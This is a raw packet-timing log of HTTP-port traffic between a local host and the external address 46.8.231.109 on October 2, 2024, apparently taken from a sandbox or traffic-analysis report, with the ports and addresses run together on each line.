                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243680000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243690968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243700027 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243700981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243712902 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243716955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243726015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243737936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243756056 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.243781090 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249197006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249211073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249222994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249234915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249264956 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249293089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249309063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249367952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249378920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249403000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249423027 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249425888 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249439001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249449968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249459982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249470949 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249497890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249581099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249591112 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249602079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249613047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249614954 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249624968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249629021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249655962 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249682903 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.249716997 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.250294924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.250305891 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.250315905 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.250339031 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.250354052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256201982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256249905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256274939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256287098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256316900 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256335020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256351948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256364107 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256375074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256386042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256397009 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256397963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256428003 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256439924 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256448030 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256474018 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256510019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256548882 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256553888 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256565094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256619930 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256666899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256674051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256675959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256680965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256733894 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256752014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256763935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256793976 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.256812096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257188082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257199049 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257210016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257236958 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257252932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257265091 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257271051 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257293940 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257307053 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257358074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257369041 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257379055 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257390022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257400990 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257406950 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257435083 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257446051 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257489920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257502079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257514000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257538080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.257564068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258198023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258209944 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258219957 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258234978 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258244991 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258251905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258255959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258280993 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258301020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258337975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258348942 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258359909 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258371115 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258373976 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258383989 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258394003 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258420944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258897066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.258958101 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259027004 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259037971 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259048939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259059906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259069920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259103060 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259115934 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259128094 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259136915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259147882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259154081 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259159088 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259182930 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259207964 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259233952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259243965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259254932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259282112 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259305000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259901047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259912968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259922981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259944916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259979010 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.259994030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260004997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260015965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260026932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260044098 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260052919 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260082960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260106087 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260143042 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260184050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260195017 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260206938 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260216951 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260225058 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260232925 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260234118 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260256052 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260282040 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260829926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260900974 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260950089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260987997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.260998011 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261009932 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261030912 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261040926 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261065960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261077881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261087894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261096954 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261106014 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.261133909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329665899 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329696894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329710007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329730034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329744101 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329750061 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329757929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329802036 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329833031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329844952 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329854965 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329879999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329895020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329911947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329925060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329935074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.329972982 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330018997 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330030918 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330041885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330054998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330065012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330069065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330095053 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330106020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330137968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330173016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330183029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330214977 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330236912 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330256939 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330267906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.330316067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336566925 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336604118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336612940 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336617947 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336637974 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336647034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336683035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336694002 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336704016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336714983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336716890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336743116 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336772919 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336852074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336863041 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336874008 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336885929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336890936 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336913109 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336939096 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.336956024 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337017059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337027073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337029934 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337055922 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337076902 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337110043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337121010 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337131977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337152958 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337177992 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337299109 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337322950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337332964 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337344885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337377071 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337414980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337424994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.337455034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343741894 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343801022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343811035 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343831062 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343851089 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343871117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343892097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343900919 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343934059 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.343951941 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344028950 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344067097 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344077110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344088078 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344100952 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344114065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344172001 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344183922 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344193935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344206095 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344213963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344225883 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344238043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344310045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344321966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344347000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344371080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344392061 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344403028 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344441891 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:07.344470024 CEST805851546.8.231.109192.168.2.6
